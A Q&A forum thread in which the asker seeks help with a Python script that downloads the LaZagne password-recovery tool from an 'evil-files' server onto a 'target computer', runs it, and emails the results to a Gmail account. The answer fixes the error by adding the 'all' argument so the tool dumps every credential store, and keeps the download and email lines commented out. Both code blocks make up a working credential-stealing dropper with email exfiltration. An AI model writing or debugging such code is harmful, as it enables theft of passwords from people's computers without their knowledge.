# How To resolve python error :return run(*popenargs, stdout=PIPE, timeout=timeout, check=True,

Tags: python, python-requests, subprocess

I want to make a python program which download and execute the lazane software to target computer and then send me the result on my mail box. But there are the errors pls suggest me somthing.thank

**code**

```
import requests , subprocess, smtplib

def download(url):
    get_response = requests.get(url)
    file_name = url.split("/")[-1]
    with open(file_name, "wb") as out_file:
        out_file.write(get_response.content)

def send_mail(email, password, message):
    server = smtplib.SMTP("smtp.gmail.com", 587)
    server.starttls()
    server.login(email, password)
    server.sendmail(email, email, message)
    server.quit()

download("http://192.168.10.9/evil-files/lazagne.exe")
result = subprocess.check_output("lazagne.exe", shell=True)
send_mail("emmajuila909@gmail.com", "mypassword", result)
```

**ERRORS**

```
Traceback (most recent call last): File "C:/path/keylogger.py", line 18, in
result = subprocess.check_output("lazagne.exe", shell=True)
File "C:\New folder\lib\subprocess.py", line 411, in check_output
return run(*popenargs, stdout=PIPE, timeout=timeout, check=True,
File "C:\New folder\lib\subprocess.py", line 512, in run
raise CalledProcessError(retcode, process.args,
subprocess.CalledProcessError: Command 'lazagne.exe' returned non-zero exit status 1.

Process finished with exit code 1
```

Answer (score 0):

You were not passing any arguments to the 'lazagne.exe' like {chats,mails,all,git,svn,windows etc. . . . }

```py
import requests
import subprocess
import smtplib


def download(url):
    get_response = requests.get(url)
    file_name = url.split("/")[-1]
    with open(file_name, "wb") as out_file:
        out_file.write(get_response.content)


def send_mail(email, password, message):
    server = smtplib.SMTP("smtp.gmail.com", 587)
    server.starttls()
    server.login(email, password)
    server.sendmail(email, email, message)
    server.quit()


# download("http://192.168.10.9/evil-files/lazagne.exe")
cmd = ["lazagne.exe", "all"]
result = subprocess.check_output(cmd, universal_newlines=True)
print(result)
# send_mail("emmajuila909@gmail.com", "mypassword", result)
```

I've commented out the parts for downloading and sending email. Notice how I'm sending the "all" argument to the exe.
Also the **universal_newlines=True** will print the newline instead of "\n" characters.